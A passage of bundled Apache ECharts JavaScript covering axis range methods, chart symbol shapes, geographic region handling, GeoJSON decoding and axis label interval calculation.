{\n        var option = this.option;\n        var min = (!origin && option.rangeStart != null)\n            ? option.rangeStart : option.min;\n\n        if (this.axis\n            && min != null\n            && min !== 'dataMin'\n            && typeof min !== 'function'\n            && !eqNaN(min)\n        ) {\n            min = this.axis.scale.parse(min);\n        }\n        return min;\n    },\n\n    /**\n     * @param {boolean} origin\n     * @return {number|string} max value or 'dataMax' or null/undefined (means auto) or NaN\n     */\n    getMax: function (origin) {\n        var option = this.option;\n        var max = (!origin && option.rangeEnd != null)\n            ? option.rangeEnd : option.max;\n\n        if (this.axis\n            && max != null\n            && max !== 'dataMax'\n            && typeof max !== 'function'\n            && !eqNaN(max)\n        ) {\n            max = this.axis.scale.parse(max);\n        }\n        return max;\n    },\n\n    /**\n     * @return {boolean}\n     */\n    getNeedCrossZero: function () {\n        var option = this.option;\n        return (option.rangeStart != null || option.rangeEnd != null)\n            ? false : !option.scale;\n    },\n\n    /**\n     * Should be implemented by each axis model if necessary.\n     * @return {module:echarts/model/Component} coordinate system model\n     */\n    getCoordSysModel: noop,\n\n    /**\n     * @param {number} rangeStart Can only be finite number or null/undefined or NaN.\n     * @param {number} rangeEnd Can only be finite number or null/undefined or NaN.\n     */\n    setRange: function (rangeStart, rangeEnd) {\n        this.option.rangeStart = rangeStart;\n        this.option.rangeEnd = rangeEnd;\n    },\n\n    /**\n     * Reset range\n     */\n    resetRange: function () {\n        // rangeStart and rangeEnd is readonly.\n        this.option.rangeStart = this.option.rangeEnd = null;\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// Symbol factory\n\n/**\n * Triangle shape\n * @inner\n */\nvar Triangle = extendShape({\n    type: 'triangle',\n    shape: {\n        cx: 0,\n        cy: 0,\n        width: 0,\n        height: 0\n    },\n    buildPath: function (path, shape) {\n        var cx = shape.cx;\n        var cy = shape.cy;\n        var width = shape.width / 2;\n        var height = shape.height / 2;\n        path.moveTo(cx, cy - height);\n        path.lineTo(cx + width, cy + height);\n        path.lineTo(cx - width, cy + height);\n        path.closePath();\n    }\n});\n\n/**\n * Diamond shape\n * @inner\n */\nvar Diamond = extendShape({\n    type: 'diamond',\n    shape: {\n        cx: 0,\n        cy: 0,\n        width: 0,\n        height: 0\n    },\n    buildPath: function (path, shape) {\n        var cx = shape.cx;\n        var cy = shape.cy;\n        var width = shape.width / 2;\n        var height = shape.height / 2;\n        path.moveTo(cx, cy - height);\n        path.lineTo(cx + width, cy);\n        path.lineTo(cx, cy + height);\n        path.lineTo(cx - width, cy);\n        path.closePath();\n    }\n});\n\n/**\n * Pin shape\n * @inner\n */\nvar Pin = extendShape({\n    type: 'pin',\n    shape: {\n        // x, y on the cusp\n        x: 0,\n        y: 0,\n        width: 0,\n        height: 0\n    },\n\n    buildPath: function (path, shape) {\n        var x = shape.x;\n        var y = shape.y;\n        var w = shape.width / 5 * 3;\n        // Height must be larger than width\n        var h = Math.max(w, shape.height);\n        var r = w / 2;\n\n        // Dist on y with tangent point and circle center\n        var dy = r * r / (h - r);\n        var cy = y - h + r + dy;\n        var angle = Math.asin(dy / r);\n        // Dist on x with tangent point and circle center\n        var dx = Math.cos(angle) * r;\n\n        var tanX = Math.sin(angle);\n        var tanY = Math.cos(angle);\n\n        var cpLen = r * 0.6;\n        var cpLen2 = r * 0.7;\n\n        path.moveTo(x - dx, cy + dy);\n\n        path.arc(\n            x, cy, r,\n            Math.PI - angle,\n            Math.PI * 2 + angle\n        );\n        path.bezierCurveTo(\n            x + dx - tanX * cpLen, cy + dy + tanY * cpLen,\n            x, y - cpLen2,\n            x, y\n        );\n        path.bezierCurveTo(\n            x, y - cpLen2,\n            x - dx + tanX * cpLen, cy + dy + tanY * cpLen,\n            x - dx, cy + dy\n        );\n        path.closePath();\n    }\n});\n\n/**\n * Arrow shape\n * @inner\n */\nvar Arrow = extendShape({\n\n    type: 'arrow',\n\n    shape: {\n        x: 0,\n        y: 0,\n        width: 0,\n        height: 0\n    },\n\n    buildPath: function (ctx, shape) {\n        var height = shape.height;\n        var width = shape.width;\n        var x = shape.x;\n        var y = shape.y;\n        var dx = width / 3 * 2;\n        ctx.moveTo(x, y);\n        ctx.lineTo(x + dx, y + height);\n        ctx.lineTo(x, y + height / 4 * 3);\n        ctx.lineTo(x - dx, y + height);\n        ctx.lineTo(x, y);\n        ctx.closePath();\n    }\n});\n\n/**\n * Map of path contructors\n * @type {Object.<string, module:zrender/graphic/Path>}\n */\nvar symbolCtors = {\n\n    line: Line,\n\n    rect: Rect,\n\n    roundRect: Rect,\n\n    square: Rect,\n\n    circle: Circle,\n\n    diamond: Diamond,\n\n    pin: Pin,\n\n    arrow: Arrow,\n\n    triangle: Triangle\n};\n\nvar symbolShapeMakers = {\n\n    line: function (x, y, w, h, shape) {\n        // FIXME\n        shape.x1 = x;\n        shape.y1 = y + h / 2;\n        shape.x2 = x + w;\n        shape.y2 = y + h / 2;\n    },\n\n    rect: function (x, y, w, h, shape) {\n        shape.x = x;\n        shape.y = y;\n        shape.width = w;\n        shape.height = h;\n    },\n\n    roundRect: function (x, y, w, h, shape) {\n        shape.x = x;\n        shape.y = y;\n        shape.width = w;\n        shape.height = h;\n        shape.r = Math.min(w, h) / 4;\n    },\n\n    square: function (x, y, w, h, shape) {\n        var size = Math.min(w, h);\n        shape.x = x;\n        shape.y = y;\n        shape.width = size;\n        shape.height = size;\n    },\n\n    circle: function (x, y, w, h, shape) {\n        // Put circle in the center of square\n        shape.cx = x + w / 2;\n        shape.cy = y + h / 2;\n        shape.r = Math.min(w, h) / 2;\n    },\n\n    diamond: function (x, y, w, h, shape) {\n        shape.cx = x + w / 2;\n        shape.cy = y + h / 2;\n        shape.width = w;\n        shape.height = h;\n    },\n\n    pin: function (x, y, w, h, shape) {\n        shape.x = x + w / 2;\n        shape.y = y + h / 2;\n        shape.width = w;\n        shape.height = h;\n    },\n\n    arrow: function (x, y, w, h, shape) {\n        shape.x = x + w / 2;\n        shape.y = y + h / 2;\n        shape.width = w;\n        shape.height = h;\n    },\n\n    triangle: function (x, y, w, h, shape) {\n        shape.cx = x + w / 2;\n        shape.cy = y + h / 2;\n        shape.width = w;\n        shape.height = h;\n    }\n};\n\nvar symbolBuildProxies = {};\neach$1(symbolCtors, function (Ctor, name) {\n    symbolBuildProxies[name] = new Ctor();\n});\n\nvar SymbolClz = extendShape({\n\n    type: 'symbol',\n\n    shape: {\n        symbolType: '',\n        x: 0,\n        y: 0,\n        width: 0,\n        height: 0\n    },\n\n    calculateTextPosition: function (out, style, rect) {\n        var res = calculateTextPosition(out, style, rect);\n        var shape = this.shape;\n        if (shape && shape.symbolType === 'pin' && style.textPosition === 'inside') {\n            res.y = rect.y + rect.height * 0.4;\n        }\n        return res;\n    },\n\n    buildPath: function (ctx, shape, inBundle) {\n        var symbolType = shape.symbolType;\n        if (symbolType !== 'none') {\n            var proxySymbol = symbolBuildProxies[symbolType];\n            if (!proxySymbol) {\n                // Default rect\n                symbolType = 'rect';\n                proxySymbol = symbolBuildProxies[symbolType];\n            }\n            symbolShapeMakers[symbolType](\n                shape.x, shape.y, shape.width, shape.height, proxySymbol.shape\n            );\n            proxySymbol.buildPath(ctx, proxySymbol.shape, inBundle);\n        }\n    }\n});\n\n// Provide setColor helper method to avoid determine if set the fill or stroke outside\nfunction symbolPathSetColor(color, innerColor) {\n    if (this.type !== 'image') {\n        var symbolStyle = this.style;\n        var symbolShape = this.shape;\n        if (symbolShape && symbolShape.symbolType === 'line') {\n            symbolStyle.stroke = color;\n        }\n        else if (this.__isEmptyBrush) {\n            symbolStyle.stroke = color;\n            symbolStyle.fill = innerColor || '#fff';\n        }\n        else {\n            // FIXME 判断图形默认是填充还是描边，使用 onlyStroke ?\n            symbolStyle.fill && (symbolStyle.fill = color);\n            symbolStyle.stroke && (symbolStyle.stroke = color);\n        }\n        this.dirty(false);\n    }\n}\n\n/**\n * Create a symbol element with given symbol configuration: shape, x, y, width, height, color\n * @param {string} symbolType\n * @param {number} x\n * @param {number} y\n * @param {number} w\n * @param {number} h\n * @param {string} color\n * @param {boolean} [keepAspect=false] whether to keep the ratio of w/h,\n *                            for path and image only.\n */\nfunction createSymbol(symbolType, x, y, w, h, color, keepAspect) {\n    // TODO Support image object, DynamicImage.\n\n    var isEmpty = symbolType.indexOf('empty') === 0;\n    if (isEmpty) {\n        symbolType = symbolType.substr(5, 1).toLowerCase() + symbolType.substr(6);\n    }\n    var symbolPath;\n\n    if (symbolType.indexOf('image://') === 0) {\n        symbolPath = makeImage(\n            symbolType.slice(8),\n            new BoundingRect(x, y, w, h),\n            keepAspect ? 'center' : 'cover'\n        );\n    }\n    else if (symbolType.indexOf('path://') === 0) {\n        symbolPath = makePath(\n            symbolType.slice(7),\n            {},\n            new BoundingRect(x, y, w, h),\n            keepAspect ? 'center' : 'cover'\n        );\n    }\n    else {\n        symbolPath = new SymbolClz({\n            shape: {\n                symbolType: symbolType,\n                x: x,\n                y: y,\n                width: w,\n                height: h\n            }\n        });\n    }\n\n    symbolPath.__isEmptyBrush = isEmpty;\n\n    symbolPath.setColor = symbolPathSetColor;\n\n    symbolPath.setColor(color);\n\n    return symbolPath;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// import createGraphFromNodeEdge from './chart/helper/createGraphFromNodeEdge';\n/**\n * Create a muti dimension List structure from seriesModel.\n * @param  {module:echarts/model/Model} seriesModel\n * @return {module:echarts/data/List} list\n */\nfunction createList(seriesModel) {\n    return createListFromArray(seriesModel.getSource(), seriesModel);\n}\n\nvar dataStack$1 = {\n    isDimensionStacked: isDimensionStacked,\n    enableDataStack: enableDataStack,\n    getStackedDimension: getStackedDimension\n};\n\n/**\n * Create scale\n * @param {Array.<number>} dataExtent\n * @param {Object|module:echarts/Model} option\n */\nfunction createScale(dataExtent, option) {\n    var axisModel = option;\n    if (!Model.isInstance(option)) {\n        axisModel = new Model(option);\n        mixin(axisModel, axisModelCommonMixin);\n    }\n\n    var scale = createScaleByModel(axisModel);\n    scale.setExtent(dataExtent[0], dataExtent[1]);\n\n    niceScaleExtent(scale, axisModel);\n    return scale;\n}\n\n/**\n * Mixin common methods to axis model,\n *\n * Inlcude methods\n * `getFormattedLabels() => Array.<string>`\n * `getCategories() => Array.<string>`\n * `getMin(origin: boolean) => number`\n * `getMax(origin: boolean) => number`\n * `getNeedCrossZero() => boolean`\n * `setRange(start: number, end: number)`\n * `resetRange()`\n */\nfunction mixinAxisModelCommonMethods(Model$$1) {\n    mixin(Model$$1, axisModelCommonMixin);\n}\n\nvar helper = (Object.freeze || Object)({\n\tcreateList: createList,\n\tgetLayoutRect: getLayoutRect,\n\tdataStack: dataStack$1,\n\tcreateScale: createScale,\n\tmixinAxisModelCommonMethods: mixinAxisModelCommonMethods,\n\tcompleteDimensions: completeDimensions,\n\tcreateDimensions: createDimensions,\n\tcreateSymbol: createSymbol\n});\n\nvar EPSILON$3 = 1e-8;\n\nfunction isAroundEqual$1(a, b) {\n    return Math.abs(a - b) < EPSILON$3;\n}\n\nfunction contain$1(points, x, y) {\n    var w = 0;\n    var p = points[0];\n\n    if (!p) {\n        return false;\n    }\n\n    for (var i = 1; i < points.length; i++) {\n        var p2 = points[i];\n        w += windingLine(p[0], p[1], p2[0], p2[1], x, y);\n        p = p2;\n    }\n\n    // Close polygon\n    var p0 = points[0];\n    if (!isAroundEqual$1(p[0], p0[0]) || !isAroundEqual$1(p[1], p0[1])) {\n        w += windingLine(p[0], p[1], p0[0], p0[1], x, y);\n    }\n\n    return w !== 0;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @module echarts/coord/geo/Region\n */\n\n/**\n * @param {string|Region} name\n * @param {Array} geometries\n * @param {Array.<number>} cp\n */\nfunction Region(name, geometries, cp) {\n\n    /**\n     * @type {string}\n     * @readOnly\n     */\n    this.name = name;\n\n    /**\n     * @type {Array.<Array>}\n     * @readOnly\n     */\n    this.geometries = geometries;\n\n    if (!cp) {\n        var rect = this.getBoundingRect();\n        cp = [\n            rect.x + rect.width / 2,\n            rect.y + rect.height / 2\n        ];\n    }\n    else {\n        cp = [cp[0], cp[1]];\n    }\n    /**\n     * @type {Array.<number>}\n     */\n    this.center = cp;\n}\n\nRegion.prototype = {\n\n    constructor: Region,\n\n    properties: null,\n\n    /**\n     * @return {module:zrender/core/BoundingRect}\n     */\n    getBoundingRect: function () {\n        var rect = this._rect;\n        if (rect) {\n            return rect;\n        }\n\n        var MAX_NUMBER = Number.MAX_VALUE;\n        var min$$1 = [MAX_NUMBER, MAX_NUMBER];\n        var max$$1 = [-MAX_NUMBER, -MAX_NUMBER];\n        var min2 = [];\n        var max2 = [];\n        var geometries = this.geometries;\n        for (var i = 0; i < geometries.length; i++) {\n            // Only support polygon\n            if (geometries[i].type !== 'polygon') {\n                continue;\n            }\n            // Doesn't consider hole\n            var exterior = geometries[i].exterior;\n            fromPoints(exterior, min2, max2);\n            min(min$$1, min$$1, min2);\n            max(max$$1, max$$1, max2);\n        }\n        // No data\n        if (i === 0) {\n            min$$1[0] = min$$1[1] = max$$1[0] = max$$1[1] = 0;\n        }\n\n        return (this._rect = new BoundingRect(\n            min$$1[0], min$$1[1], max$$1[0] - min$$1[0], max$$1[1] - min$$1[1]\n        ));\n    },\n\n    /**\n     * @param {<Array.<number>} coord\n     * @return {boolean}\n     */\n    contain: function (coord) {\n        var rect = this.getBoundingRect();\n        var geometries = this.geometries;\n        if (!rect.contain(coord[0], coord[1])) {\n            return false;\n        }\n        loopGeo: for (var i = 0, len$$1 = geometries.length; i < len$$1; i++) {\n            // Only support polygon.\n            if (geometries[i].type !== 'polygon') {\n                continue;\n            }\n            var exterior = geometries[i].exterior;\n            var interiors = geometries[i].interiors;\n            if (contain$1(exterior, coord[0], coord[1])) {\n                // Not in the region if point is in the hole.\n                for (var k = 0; k < (interiors ? interiors.length : 0); k++) {\n                    if (contain$1(interiors[k])) {\n                        continue loopGeo;\n                    }\n                }\n                return true;\n            }\n        }\n        return false;\n    },\n\n    transformTo: function (x, y, width, height) {\n        var rect = this.getBoundingRect();\n        var aspect = rect.width / rect.height;\n        if (!width) {\n            width = aspect * height;\n        }\n        else if (!height) {\n            height = width / aspect;\n        }\n        var target = new BoundingRect(x, y, width, height);\n        var transform = rect.calculateTransform(target);\n        var geometries = this.geometries;\n        for (var i = 0; i < geometries.length; i++) {\n            // Only support polygon.\n            if (geometries[i].type !== 'polygon') {\n                continue;\n            }\n            var exterior = geometries[i].exterior;\n            var interiors = geometries[i].interiors;\n            for (var p = 0; p < exterior.length; p++) {\n                applyTransform(exterior[p], exterior[p], transform);\n            }\n            for (var h = 0; h < (interiors ? interiors.length : 0); h++) {\n                for (var p = 0; p < interiors[h].length; p++) {\n                    applyTransform(interiors[h][p], interiors[h][p], transform);\n                }\n            }\n        }\n        rect = this._rect;\n        rect.copy(target);\n        // Update center\n        this.center = [\n            rect.x + rect.width / 2,\n            rect.y + rect.height / 2\n        ];\n    },\n\n    cloneShallow: function (name) {\n        name == null && (name = this.name);\n        var newRegion = new Region(name, this.geometries, this.center);\n        newRegion._rect = this._rect;\n        newRegion.transformTo = null; // Simply avoid to be called.\n        return newRegion;\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Parse and decode geo json\n * @module echarts/coord/geo/parseGeoJson\n */\n\nfunction decode(json) {\n    if (!json.UTF8Encoding) {\n        return json;\n    }\n    var encodeScale = json.UTF8Scale;\n    if (encodeScale == null) {\n        encodeScale = 1024;\n    }\n\n    var features = json.features;\n\n    for (var f = 0; f < features.length; f++) {\n        var feature = features[f];\n        var geometry = feature.geometry;\n        var coordinates = geometry.coordinates;\n        var encodeOffsets = geometry.encodeOffsets;\n\n        for (var c = 0; c < coordinates.length; c++) {\n            var coordinate = coordinates[c];\n\n            if (geometry.type === 'Polygon') {\n                coordinates[c] = decodePolygon(\n                    coordinate,\n                    encodeOffsets[c],\n                    encodeScale\n                );\n            }\n            else if (geometry.type === 'MultiPolygon') {\n                for (var c2 = 0; c2 < coordinate.length; c2++) {\n                    var polygon = coordinate[c2];\n                    coordinate[c2] = decodePolygon(\n                        polygon,\n                        encodeOffsets[c][c2],\n                        encodeScale\n                    );\n                }\n            }\n        }\n    }\n    // Has been decoded\n    json.UTF8Encoding = false;\n    return json;\n}\n\nfunction decodePolygon(coordinate, encodeOffsets, encodeScale) {\n    var result = [];\n    var prevX = encodeOffsets[0];\n    var prevY = encodeOffsets[1];\n\n    for (var i = 0; i < coordinate.length; i += 2) {\n        var x = coordinate.charCodeAt(i) - 64;\n        var y = coordinate.charCodeAt(i + 1) - 64;\n        // ZigZag decoding\n        x = (x >> 1) ^ (-(x & 1));\n        y = (y >> 1) ^ (-(y & 1));\n        // Delta deocding\n        x += prevX;\n        y += prevY;\n\n        prevX = x;\n        prevY = y;\n        // Dequantize\n        result.push([x / encodeScale, y / encodeScale]);\n    }\n\n    return result;\n}\n\n/**\n * @alias module:echarts/coord/geo/parseGeoJson\n * @param {Object} geoJson\n * @return {module:zrender/container/Group}\n */\nvar parseGeoJson$1 = function (geoJson) {\n\n    decode(geoJson);\n\n    return map(filter(geoJson.features, function (featureObj) {\n        // Output of mapshaper may have geometry null\n        return featureObj.geometry\n            && featureObj.properties\n            && featureObj.geometry.coordinates.length > 0;\n    }), function (featureObj) {\n        var properties = featureObj.properties;\n        var geo = featureObj.geometry;\n\n        var coordinates = geo.coordinates;\n\n        var geometries = [];\n        if (geo.type === 'Polygon') {\n            geometries.push({\n                type: 'polygon',\n                // According to the GeoJSON specification.\n                // First must be exterior, and the rest are all interior(holes).\n                exterior: coordinates[0],\n                interiors: coordinates.slice(1)\n            });\n        }\n        if (geo.type === 'MultiPolygon') {\n            each$1(coordinates, function (item) {\n                if (item[0]) {\n                    geometries.push({\n                        type: 'polygon',\n                        exterior: item[0],\n                        interiors: item.slice(1)\n                    });\n                }\n            });\n        }\n\n        var region = new Region(\n            properties.name,\n            geometries,\n            properties.cp\n        );\n        region.properties = properties;\n        return region;\n    });\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar inner$6 = makeInner();\n\n/**\n * @param {module:echats/coord/Axis} axis\n * @return {Object} {\n *     labels: [{\n *         formattedLabel: string,\n *         rawLabel: string,\n *         tickValue: number\n *     }, ...],\n *     labelCategoryInterval: number\n * }\n */\nfunction createAxisLabels(axis) {\n    // Only ordinal scale support tick interval\n    return axis.type === 'category'\n        ? makeCategoryLabels(axis)\n        : makeRealNumberLabels(axis);\n}\n\n/**\n * @param {module:echats/coord/Axis} axis\n * @param {module:echarts/model/Model} tickModel For example, can be axisTick, splitLine, splitArea.\n * @return {Object} {\n *     ticks: Array.<number>\n *     tickCategoryInterval: number\n * }\n */\nfunction createAxisTicks(axis, tickModel) {\n    // Only ordinal scale support tick interval\n    return axis.type === 'category'\n        ? makeCategoryTicks(axis, tickModel)\n        : {ticks: axis.scale.getTicks()};\n}\n\nfunction makeCategoryLabels(axis) {\n    var labelModel = axis.getLabelModel();\n    var result = makeCategoryLabelsActually(axis, labelModel);\n\n    return (!labelModel.get('show') || axis.scale.isBlank())\n        ? {labels: [], labelCategoryInterval: result.labelCategoryInterval}\n        : result;\n}\n\nfunction makeCategoryLabelsActually(axis, labelModel) {\n    var labelsCache = getListCache(axis, 'labels');\n    var optionLabelInterval = getOptionCategoryInterval(labelModel);\n    var result = listCacheGet(labelsCache, optionLabelInterval);\n\n    if (result) {\n        return result;\n    }\n\n    var labels;\n    var numericLabelInterval;\n\n    if (isFunction$1(optionLabelInterval)) {\n        labels = makeLabelsByCustomizedCategoryInterval(axis, optionLabelInterval);\n    }\n    else {\n        numericLabelInterval = optionLabelInterval === 'auto'\n            ? makeAutoCategoryInterval(axis) : optionLabelInterval;\n        labels = makeLabelsByNumericCategoryInterval(axis, numericLabelInterval);\n    }\n\n    // Cache to avoid calling interval function repeatly.\n    return listCacheSet(labelsCache, optionLabelInterval, {\n        labels: labels, labelCategoryInterval: numericLabelInterval\n    });\n}\n\nfunction makeCategoryTicks(axis, tickModel) {\n    var ticksCache = getListCache(axis, 'ticks');\n    var optionTickInterval = getOptionCategoryInterval(tickModel);\n    var result = listCacheGet(ticksCache, optionTickInterval);\n\n    if (result) {\n        return result;\n    }\n\n    var ticks;\n    var tickCategoryInterval;\n\n    // Optimize for the case that large category data and no label displayed,\n    // we should not return all ticks.\n    if (!tickModel.get('show') || axis.scale.isBlank()) {\n        ticks = [];\n    }\n\n    if (isFunction$1(optionTickInterval)) {\n        ticks = makeLabelsByCustomizedCategoryInterval(axis, optionTickInterval, true);\n    }\n    // Always use label interval by default despite label show. Consider this\n    // scenario, Use multiple grid with the xAxis sync, and only one xAxis shows\n    // labels. `splitLine` and `axisTick` should be consistent in this case.\n    else if (optionTickInterval === 'auto') {\n        var labelsResult = makeCategoryLabelsActually(axis, axis.getLabelModel());\n        tickCategoryInterval = labelsResult.labelCategoryInterval;\n        ticks = map(labelsResult.labels, function (labelItem) {\n            return labelItem.tickValue;\n        });\n    }\n    else {\n        tickCategoryInterval = optionTickInterval;\n        ticks = makeLabelsByNumericCategoryInterval(axis, tickCategoryInterval, true);\n    }\n\n    // Cache to avoid calling interval function repeatly.\n    return listCacheSet(ticksCache, optionTickInterval, {\n        ticks: ticks, tickCategoryInterval: tickCategoryInterval\n    });\n}\n\nfunction makeRealNumberLabels(axis) {\n    var ticks = axis.scale.getTicks();\n    var labelFormatter = makeLabelFormatter(axis);\n    return {\n        labels: map(ticks, function (tickValue, idx) {\n            return {\n                formattedLabel: labelFormatter(tickValue, idx),\n                rawLabel: axis.scale.getLabel(tickValue),\n                tickValue: tickValue\n            };\n        })\n    };\n}\n\n// Large category data calculation is performence sensitive, and ticks and label\n// probably be fetched by multiple times. So we cache the result.\n// axis is created each time during a ec process, so we do not need to clear cache.\nfunction getListCache(axis, prop) {\n    // Because key can be funciton, and cache size always be small, we use array cache.\n    return inner$6(axis)[prop] || (inner$6(axis)[prop] = []);\n}\n\nfunction listCacheGet(cache, key) {\n    for (var i = 0; i < cache.length; i++) {\n        if (cache[i].key === key) {\n            return cache[i].value;\n        }\n    }\n}\n\nfunction listCacheSet(cache, key, value) {\n    cache.push({key: key, value: value});\n    return value;\n}\n\nfunction makeAutoCategoryInterval(axis) {\n    var result = inner$6(axis).autoInterval;\n    return result != null\n        ? result\n        : (inner$6(axis).autoInterval = axis.calculateCategoryInterval());\n}\n\n/**\n * Calculate interval for category axis ticks and labels.\n * To get precise result, at least one of `getRotate` and `isHorizontal`\n * should be implemented in axis.\n */\nfunction calculateCategoryInterval(axis) {\n    var params = fetchAutoCategoryIntervalCalculationParams(axis);\n    var labelFormatter = makeLabelFormatter(axis);\n    var rotation = (params.axisRotate - params.labelRotate) / 180 * Math.PI;\n\n    var ordinalScale = axis.scale;\n    var ordinalExtent = ordinalScale.getExtent();\n    // Providing this method is for optimization:\n    // avoid generating a long array by `getTicks`\n    // in large category data case.\n    var tickCount = ordinalScale.count();\n\n    if (ordinalExtent[1] - ordinalExtent[0] < 1) {\n        return 0;\n    }\n\n    var step = 1;\n    // Simple optimization. Empirical value: tick count should less than 40.\n    if (tickCount > 40) {\n        step = Math.max(1, Math.floor(tickCount / 40));\n    }\n    var tickValue = ordinalExtent[0];\n    var unitSpan = axis.dataToCoord(tickValue + 1) - axis.dataToCoord(tickValue);\n    var unitW = Math.abs(unitSpan * Math.cos(rotation));\n    var unitH = Math.abs(unitSpan * Math.sin(rotation));\n\n    var maxW = 0;\n    var maxH = 0;\n\n    // Caution: Performance sensitive for large category data.\n    // Consider dataZoom, we should make appropriate step to avoid O(n) loop.\n    for (; tickValue <= ordinalExtent[1]; tickValue += step) {\n        var width = 0;\n        var height = 0;\n\n        // Not precise, do not consider align and vertical align\n        // and each distance from axis line yet.\n        var rect = getBoundingRect(\n            labelFormatter(tickValue), params.font, 'center', 'top'\n        );\n        // Magic number\n        width = rect.width * 1.3;\n        height = rect.height * 1.3;\n\n        // Min size, void long loop.\n        maxW = Math.max(maxW, width, 7);\n        maxH = Math.max(maxH, height, 7);\n    }\n\n    var dw = maxW / unitW;\n    var dh = maxH / unitH;\n    // 0/0 is NaN, 1/0 is Infinity.\n    isNaN(dw) && (dw = Infinity);\n    isNaN(dh) && (dh = Infinity);\n    var interval = Math.max(0, Math.floor(Math.min(dw, dh)));\n\n    var cache = inner$6(axis.model);\n    var axisExtent = axis.getExtent();\n    var lastAutoInterval = cache.lastAutoInterval;\n    var lastTickCount = cache.lastTickCount;\n\n    // Use cache to keep interval stable while moving zoom window,\n    // otherwise the calculated interval might jitter when the zoom\n    // window size is close to the interval-changing size.\n    // For example, if all of the axis labels are `a, b, c, d, e, f, g`.\n    // The jitter will cause that sometimes the displayed labels are\n    // `a, d, g` (interval: 2) sometimes `a, c, e`(interval: 1).\n    if (lastAutoInterval != null\n        && lastTickCount != null\n        && Math.abs(lastAutoInterval - interval) <= 1\n        && Math.abs(lastTickCount - tickCount) <= 1\n        // Always choose the bigger one, otherwise the critical\n        // point is not the same when zooming in or zooming out.\n        && lastAutoInterval > interval\n        // If the axis change is caused by chart resize, the cache should not\n        // be used. Otherwise some hiden labels might not be shown again.\n        && cache.axisExtend0 === axisExtent[0]\n        && cache.axisExtend1 === axisExtent[1]\n    ) {\n        interval = lastAutoInterval;\n    }\n    // Only update cache if cache not used, otherwise the\n    // changing of interval is too insensitive.\n    else {\n        cache.lastTickCount = tickCount;\n        cache.lastAutoInterval = interval;\n        cache.axisExtend0 = axisExtent[0];\n        cache.axisExtend1 = axisExtent[1];\n    }\n\n    return interval;\n}\n\nfunction fetchAutoCategoryIntervalCalculationParams(axis) {\n    var labelModel = axis.getLabelModel();\n    return {\n        axisRotate: axis.getRotate\n            ? axis.getRotate()\n            : (axis.isHorizontal && !axis.isHorizontal())\n            ? 90\n            : 0,\n        labelRotate: labelModel.get('rotate') || 0,\n        font: labelModel.getFont()\n    };\n}\n\nfunction makeLabelsByNumericCategoryInterval(axis, categoryInterval, onlyTick) {\n    var labelFormatter = makeLabelFormatter(axis);\n    var ordinalScale = axis.scale;\n    var ordinalExtent = ordinalScale.getExtent();\n    var labelModel = axis.getLabelModel();\n    var result = [];\n\n    // TODO: axisType: ordinalTime, pick the tick from each month/day/year/...\n\n    var step = Math.max((categoryInterval || 0) + 1, 1);\n    var startTick = ordinalExtent[0];\n    var tickCount = ordinalScale.count();\n\n    // Calculate start tick based on zero if possible to keep label consistent\n    // while zooming and moving while interval > 0. Otherwise the selection\n    // of displayable ticks and symbols probably keep changing.\n    // 3 is empirical value.\n    if (startTick !== 0 && step > 1 && tickCount / step > 2) {\n        startTick = Math.round(Math.ceil(startTick / step) * step);\n    }\n\n    // (1) Only add min max label here but leave overlap checking\n    // to render stage, which also ensure the returned list\n    // suitable for splitLine and splitArea rendering.\n    // (2) Scales except category always contain min max label so\n    // do not need to perform this process.\n    var showAllLabel = shouldShowAllLabels(axis);\n    var includeMinLabel = 